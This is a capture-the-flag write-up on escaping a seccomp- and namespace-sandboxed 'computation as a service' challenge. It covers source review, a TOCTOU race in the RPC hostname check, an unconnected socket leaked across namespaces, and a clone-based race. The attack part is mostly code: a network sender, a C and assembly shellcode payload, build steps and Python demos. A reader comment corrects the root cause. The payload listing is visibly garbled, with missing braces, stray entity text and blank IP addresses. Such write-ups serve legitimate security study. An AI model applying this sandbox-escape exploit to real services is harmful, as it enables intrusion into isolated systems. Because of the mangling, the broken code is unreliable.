# Challenge Description

We realized that there was a distinct lack of cloud-based computation services
and thus decided to create something new.

It is making use of the latest super-advanced security features of Linux:
- 100% seccomp protection
- *ALL* the namespaces (wow!)
- rlimit thingies

We provide you with the source code as well as a demo instance so that you can
evaluate our high quality service.

```
nc caas.ctfcompetition.com 1337
```

# Prep Work

Let's start by seeing what the network service gives us upon connecting.

```
$ nc caas.ctfcompetition.com 1337
Welcome to the awesome cloud computation engine!
We will run your application* for you

Format: <u16 assembly length> <x64 assembly>

*) Some restrictions apply
```

Seems like we will need to submit binary data, so let's write a simple script to facilitate this.

```python
from pwn import *

s = remote('caas.ctfcompetition.com', 1337)

payload = open('payload.bin', 'rb').read()
s.write(p16(len(payload)) + payload)
```

# Investigating the Source Code

We are also given the source code of the service that runs the challenge, so let's investigate it.

In `challenge.cc` we can see that the server sets up two ancillary services in the functions `MetadataServer` and `FlagServer`.

- `MetadataServer` listens on `` and simply replies with `Not implemented` to all connections
- `FlagServer` listens on `` and replies with the contents of a file named `flag` to all connections

We now have our end goal: write some shellcode that somehow connects to `` to receive the flag and print it to stdout.

Let's investigate the server a bit further to see exactly how our payload will be run.

Every incoming connection calls `handle_connection`, which forks.
- The child process is heavily locked down and then runs our shellcode
- The parent process sets up some timeouts and then finally calls `RPC::Server(child_pid, comms_fd)`
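The parent/child split can be sketched in Python (the real implementation is C++; `run_child`, `serve_rpc` and the timeout value here are illustrative stand-ins, not the challenge's actual names):

```python
import os
import signal

def handle_connection(run_child, serve_rpc, timeout_secs=5):
    # Fork: the child runs the untrusted payload, the parent supervises.
    pid = os.fork()
    if pid == 0:
        # Child: in the challenge this is where the lockdown happens
        # (namespaces, pivot_root, capability drop, seccomp) before the
        # submitted shellcode runs.
        run_child()
        os._exit(0)
    # Parent: arm a timeout, then serve RPC requests on behalf of the child.
    signal.alarm(timeout_secs)
    serve_rpc(pid)
    os.waitpid(pid, 0)
    signal.alarm(0)

served = []
handle_connection(lambda: None, lambda pid: served.append(pid))
print(len(served))  # the parent performed one RPC-serving pass
```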

We will come back to the parent process later, but let's take a closer look at exactly how the child process that runs our shellcode is locked down.

The first observation is that the fork itself is done with a custom function `ForkWithFlags` which applies the given namespace flags to isolate the child process. As the challenge description promises, all the available namespaces are used. Most importantly given our end goal, the child process is put into its own network namespace.

Following the code further we can see that:
- we will have no filesystem (`pivot_root` into an empty directory)
- we will have no capabilities (`cap_set_proc` with default initialized capabilities)
- we will have almost no file descriptors (STDIN, STDOUT, STDERR, and FD 100 are the only ones available to us)
- nearly all memory pages in the process will be unmapped, meaning we have access to no shared library code that would otherwise already be loaded into the process
- a seccomp policy will limit the syscalls we are allowed to use

## The Seccomp Policy

Using [david942j/seccomp-tools](https://github.com/david942j/seccomp-tools) we are able to decompile the binary seccomp policy from the source code and determine the restrictions placed upon us.

The following syscalls are allowed to be called unrestricted:
- read
- write
- close
- munmap
- sched_yield
- dup
- dup2
- nanosleep
- connect
- accept
- recvmsg
- bind
- exit
- exit_group

The following syscalls are allowed to be called with specific arguments:
- clone
- socket
- `socket(AF_INET, SOCK_STREAM, 0)`
- mmap
- `mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0)`

## The RPC Server

The RPC interface is accessible to us over FD 100 and provides two functions:
- Connect
- GetEnvData

GetEnvData is entirely uninteresting and can be ignored. Connect also appears uninteresting at first glance because it whitelists the valid endpoints and does not allow connections to the flag server, but let's investigate further.

The Connect request receives data from our process with the following structure:

```cpp
struct ConnectToMetadataServerRequest {
  const char *hostname;
  uint16_t port;
};
```

Immediately the `const char *` stands out: this means the RPC server has to peek into our memory to read the contents of the hostname string. This is done through a function called `SafeRead`, which we will revisit in a moment.

The RPC flow works as follows:
- read a request object from FD 100
- call `ValidateRequest` and bail on failure
- call `ExecuteRequest` and bail on failure
- write a response object to FD 100
- optionally call `SendFD` to share a file descriptor between processes
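For illustration, a connect request could be packed from Python like this. The exact struct layout is an assumption based on typical x86-64 C++ padding of the `Request` union shown below, not something taken from the challenge binary:

```python
import struct

TYPE_CONNECT = 0  # Type::Connect

def pack_connect_request(hostname_ptr, port):
    # Assumed layout: 8-byte hostname pointer, u16 port, padding up to the
    # 16-byte union size, then a 4-byte enum type plus tail padding.
    return struct.pack('<QH6xi4x', hostname_ptr, port, TYPE_CONNECT)

req = pack_connect_request(0x7FFFDEADB000, 8080)
print(len(req))  # 24 bytes under these layout assumptions
```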

Let's look at the validate/execute methods for the connect request:

```cpp
template <>
bool ValidateRequest(pid_t pid, const ConnectToMetadataServerRequest &req) {
  static constexpr std::pair<const char *, uint16_t> allowed_hosts[] = {
      // Allow service to connect to the metadata service to obtain secrets etc.
      {"", 8080},  // Early access.
      // {"", 80},  // Full blown metadata service, not yet implemented
  };

  std::string host;
  if (!SafeRead(pid, req.hostname, 4 * 3 + 3, &host)) {
    return false;
  }

  fprintf(stderr, "host: %s port: %d\n", host.c_str(), req.port);

  bool allowed = false;
  for (const auto &p : allowed_hosts) {
    if (!strcmp(p.first, host.c_str()) && p.second == req.port) {
      allowed = true;
    }
  }

  return allowed;
}

template <>
bool ExecuteRequest(pid_t pid, const ConnectToMetadataServerRequest &req,
                    ConnectToMetadataServerResponse *res, int *fd_to_send) {
  std::string host;
  if (!SafeRead(pid, req.hostname, 31, &host)) {
    return false;
  }

  *fd_to_send = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in serv_addr = {};
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(req.port);

  if (inet_pton(AF_INET, host.c_str(), &serv_addr.sin_addr.s_addr) != 1) {
    fprintf(stderr, "inet_pton failed\n");
    *fd_to_send = -1;
    res->success = false;
  } else if (connect(*fd_to_send, (struct sockaddr *)&serv_addr,
                     sizeof(sockaddr_in)) < 0) {
    res->success = false;
  } else {
    res->success = true;
  }
  return true;
}
```

Picking this apart, we can see that `ValidateRequest` starts by calling `SafeRead` to retrieve the string value for the requested hostname, and then compares it along with the port number to a whitelist. `ExecuteRequest` follows by again calling `SafeRead` to get the requested hostname before creating a socket and connecting it to the requested endpoint.

There are two critical bugs here:
- `SafeRead` is called twice, once during validation and once during execution, opening a time-of-check-to-time-of-use (TOCTOU) window
- The socket created is stored into `fd_to_send` even when the `connect` call fails

The significance of the second bug is very subtle. The key point to understand is that a socket belongs to whatever network namespace it was created in; the namespace of the process calling `connect` is irrelevant. If our locked-down process is handed a socket file descriptor that was created outside our network namespace and is still unconnected, we can use it to connect as if we were never confined to a network namespace in the first place.
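The fd-handoff mechanics can be demonstrated in plain Python: an *unconnected* TCP socket is shipped over a unix socket via `SCM_RIGHTS` (like the server's `SendFD`) and only connected by the receiver (like our payload's `ReceiveFD` + `connect`). Everything below runs in one process, and `flag{example}` is sample data:

```python
import socket

# A local listener stands in for the flag server.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('127.0.0.1', 0))
listener.listen(1)

# Create an unconnected TCP socket and pass its fd via SCM_RIGHTS.
parent, child = socket.socketpair()
unconnected = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.send_fds(parent, [b'x'], [unconnected.fileno()])   # SendFD analogue

_, fds, _, _ = socket.recv_fds(child, 1, 1)               # ReceiveFD analogue
received = socket.socket(fileno=fds[0])
received.connect(listener.getsockname())  # the connect happens receiver-side

conn, _ = listener.accept()
conn.sendall(b'flag{example}')
data = received.recv(32)
print(data.decode())
```

`socket.send_fds`/`recv_fds` require Python 3.9+; the payload performs the equivalent `recvmsg` cmsg parsing by hand.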

## SafeRead

The authors of this program had clearly given some thought to the dangers of reading another process's memory, and so implemented a "safe" read function to mitigate them.

The implementation breaks down into the following three steps:
- verify that the other process is currently blocked on either the `read` or `recvmsg` syscall
- verify the other process only has a single thread
- call `process_vm_readv` to read the memory across process boundaries
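The two verification steps boil down to procfs reads, which can be sketched as follows (a simplified Python rendering of the idea; the real checks are in C++ and the cross-process read itself uses `process_vm_readv`):

```python
import os

def blocked_syscall(pid):
    # /proc/<pid>/syscall starts with the number of the syscall the task is
    # blocked in, or the word "running" if it is not blocked.
    with open(f'/proc/{pid}/syscall') as f:
        return f.read().split()[0]

def thread_count(pid):
    # Parse the Threads: line of /proc/<pid>/status.
    with open(f'/proc/{pid}/status') as f:
        for line in f:
            if line.startswith('Threads:'):
                return int(line.split()[1])

# This process is neither blocked nor multi-threaded right now:
print(blocked_syscall(os.getpid()), thread_count(os.getpid()))
```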

## Exploiting the Bugs

We now have a relatively clear picture of the steps we need to take to get the flag:
1. send a connect request over rpc to an allowed endpoint so that we pass the checks in `ValidateRequest`
2. after passing validation checks, but before `ExecuteRequest` starts, swap out the hostname with an address that will not be connectable
3. receive the connect response, which should give us a socket fd in an unconnected state
4. connect this socket to ``, read the flag, and write it to stdout

Everything there is straightforward except step 2:
how do we modify the hostname while our process is blocked on `read`, given that `SafeRead` rejects processes with more than one thread?

The answer lies in the `clone` syscall that is whitelisted in our seccomp filter. Let's take a look.

We are specifically allowed to call `clone` with the `CLONE_VM | CLONE_SIGHAND | CLONE_THREAD` flags.

At first glance `CLONE_THREAD` is discouraging, because it sounds like it will somehow create a thread instead of a child process and trigger the other check in `SafeRead`, but this is not the case. According to the man pages, `If CLONE_THREAD is set, the child is placed in the same thread group as the calling process.`

`CLONE_VM` is the last piece of the puzzle, as according to the man pages: `If CLONE_VM is set, the calling process and the child process run in the same memory space.`
This is perfect, as it will allow us to modify the hostname string from our child process *while our parent is still blocked on `read` and only has a single thread*.
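The resulting TOCTOU race can be sketched with an ordinary thread standing in for the `CLONE_VM` child. The hostname value below is illustrative (the real allowed host is elided above), and the race is made deterministic here with an event instead of sleeps:

```python
import threading

hostname = bytearray(b'127.0.0.1')   # illustrative allowed host
validated = threading.Event()

def racer():
    # our cloned child: wait until validation has read the string, then
    # flip the first byte so the address is valid but not connectable
    validated.wait()
    hostname[0:1] = b'2'

t = threading.Thread(target=racer)
t.start()

checked = bytes(hostname)  # time of check: SafeRead in ValidateRequest
validated.set()
t.join()
used = bytes(hostname)     # time of use: SafeRead in ExecuteRequest
print(checked.decode(), '->', used.decode())
```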

# The Payload
We now have all the pieces, so let's assemble our payload. I chose to write the payload in C rather than fumbling about in assembly directly.

## Makefile
```
g++ -O2 -static -fPIE -nostdlib -nostartfiles payload.cc -o payload.elf
objcopy -O binary -R .note.* -R .eh_frame -R .comment payload.elf payload.bin
```

## Code
"jmp _start \n"

".global syscall \n"
"syscall: \n"
"movq %rdi, %Rax \n"
"movq %rsi, %rdi \n"
"movq %rdx, %rsi \n"
"movq %rcx, %rdx \n"
"movq %r8, %r10 \n"
"movq %r9, %r8 \n"
"movq 8(%rsp),%r9 \n"
"syscall \n"
"ret \n"

".global clone \n"
"clone: \n"
"sub $0x10,%rsi \n"
"mov %rcx,0x8(%rsi) \n"
"mov %rdi,(%rsi) \n"
"mov %rdx,%rdi \n"
"mov %r8,%rdx \n"
"mov %r9,%r8 \n"
"mov 0x8(%rsp),%r10 \n"
"mov $0x38,%eax \n"
"syscall \n"
"test %rax,%rax \n"
"je 1f \n"
"retq \n"
"1: \n"
"xor %ebp,%ebp \n"
"pop %rax \n"
"pop %rdi \n"
"callq *%rax \n"
"mov %rax,%rdi \n"
"mov $0x3c,%eax \n"
"syscall \n"

#include <linux/sched.h>
#include <netinet/in.h>
#include <syscall.h>
#include <unistd.h>

extern "C" {
void _start(void);
long int syscall(long int __sysno, ...);
int clone(int (*fn)(void *), void *child_stack, int flags, void *arg);

#define write(fd, buf, sz) syscall(SYS_write, fd, buf, sz)
#define read(fd, buf, sz) syscall(SYS_read, fd, buf, sz)
#define recvmsg(fd, msg, flags) syscall(SYS_recvmsg, fd, msg, flags)
#define nanosleep(rqtp, rmtp) syscall(SYS_nanosleep, rqtp, rmtp)
#define connect(fd, addr, addrlen) syscall(SYS_connect, fd, addr, addrlen)
#define mmap(addr, len, prot, flags, fd, off) syscall(SYS_mmap, addr, len, prot, flags, fd, off)
#define exit(code) syscall(SYS_exit, code)

struct ConnectToMetadataServerRequest {
const char *hostname;
uint16_t port;

struct ConnectToMetadataServerResponse {
bool success;

struct GetEnvironmentDataRequest {
uint8_t idx;

struct GetEnvironmentDataResponse {
uint64_t data;

namespace Type {
enum type_t {
Connect = 0,
GetEnvData = 1,

struct Request {
union {
ConnectToMetadataServerRequest connect_request;
GetEnvironmentDataRequest getenvdata_request;
} req;

Type::type_t type;

struct Response {
union {
ConnectToMetadataServerResponse connect_response;
GetEnvironmentDataResponse getenvdata_response;
} res;

Type::type_t type;

static int ReceiveFD(int comms_fd) {
char fd_msg[200];
cmsghdr *cmsg = reinterpret_cast<cmsghdr *>(fd_msg);

bool data;
iovec iov = {&data, sizeof(data)};

msghdr msg;
msg.msg_name = nullptr;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = sizeof(fd_msg);
msg.msg_flags = 0;

if (recvmsg(comms_fd, &msg, 0) < 0) {
return -1;

cmsg = CMSG_FIRSTHDR(&msg;;
if (cmsg->cmsg_level == SOL_SOCKET && cmsg->cmsg_type == SCM_RIGHTS) {
if (cmsg->cmsg_len == CMSG_LEN(sizeof(int))) {
int *fds = reinterpret_cast<int *>(CMSG_DATA(cmsg));
return fds[0];

return -1;

void _sleep(long ns) {
struct timespec t = {};
t.tv_sec = 0;
t.tv_nsec = ns;
nanosleep(&t, nullptr);

int _child(void *arg) {
char* addr = (char*)arg;

// delay long enough for ValidateRequest to succeed

// modify the ip address to
// the address needs to still be valid, but not connectable
addr[0] = '2';

return 0;

void _start(void) {
// allocate stack for cloned process
char * stk = (char*)mmap(0, 0x1000, 3, 0x22, 0, 0);
if (!stk) {

char addr[] = "";

Request req;
req.req.connect_request.hostname = addr;
req.req.connect_request.port = 8080;
req.type = Type::Connect;

if (write(100, &req, sizeof(Request)) != sizeof(Request)) {

// clone ourselves to perform the attack
auto pid = clone(_child, stk + 0x1000, CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, addr);
if (pid == -1) {

// delay a bit before blocking on read to ensure clone is ready

// read response
Response resp;
if (read(100, &resp, sizeof(Response)) != sizeof(Response)) {

// receive fd from connect request
auto fd = ReceiveFD(100);
if (fd != -1) {
// if the race worked, the socket fd we have now will not be connected
struct sockaddr_in serv_addr = {};
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(0x7f000001L);
serv_addr.sin_port = htons(6666);

// connect socket to
auto res = connect(fd, &serv_addr, sizeof(sockaddr_in));
if (res == 0) {
char buf[100];

// dump flag to stdout
auto len = read(fd, buf, sizeof(buf));
if (len > 0) {
write(STDOUT_FILENO, buf, len);


# Dumping the Flag

Build the payload:

```
$ make
g++ -O2 -static -fPIE -nostdlib -nostartfiles payload.cc -o payload.elf
objcopy -O binary -R .note.* -R .eh_frame -R .comment payload.elf payload.bin
```

Execute the payload with our script from earlier:

```
$ python do.py
[+] Opening connection to caas.ctfcompetition.com on port 1337: Done
[*] Closed connection to caas.ctfcompetition.com port 1337
```

Try again, because race conditions aren't entirely reliable:

```
$ python do.py
[+] Opening connection to caas.ctfcompetition.com on port 1337: Done
[*] Closed connection to caas.ctfcompetition.com port 1337
```
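Since the race only lands some of the time, the rerunning can be automated. A generic sketch, where `attempt` stands in for one run of do.py and `CTF{` is an assumed flag prefix:

```python
def retry_until(attempt, success, max_tries=20):
    # Re-run attempt() until success(result) holds; None if we never win.
    for _ in range(max_tries):
        result = attempt()
        if success(result):
            return result
    return None

# demo with a deliberately flaky stand-in for the exploit run
outcomes = iter([b'', b'', b'CTF{example}'])
winner = retry_until(lambda: next(outcomes), lambda r: b'CTF{' in r)
print(winner)
```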

# Comments

WGH (June 27, 2019, 2:48 p.m.)

We were ridiculously close to solving the task. I investigated the bug and want to correct you a bit.

`CLONE_VM | CLONE_THREAD` actually does create a proper thread, and it is reported in "Threads" counter in procfs.

The actual bug in this challenge was that the thread check never worked. The `ReadWholeFile` function calculated the file size with `fseek(..., SEEK_END)` + `ftell(...)`, but that always returns 0 for procfs pseudo-files, so `ReadWholeFile` always returned an empty file and the thread count was always taken to be 0.
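WGH's observation is easy to reproduce: procfs pseudo-files report a size of 0, which is effectively what an `fseek(SEEK_END)` + `ftell` size probe sees, even though reading them yields data:

```python
import os

path = '/proc/self/status'
reported = os.path.getsize(path)  # what a seek-to-end size probe sees
with open(path, 'rb') as f:
    actual = len(f.read())
print(reported, actual)
```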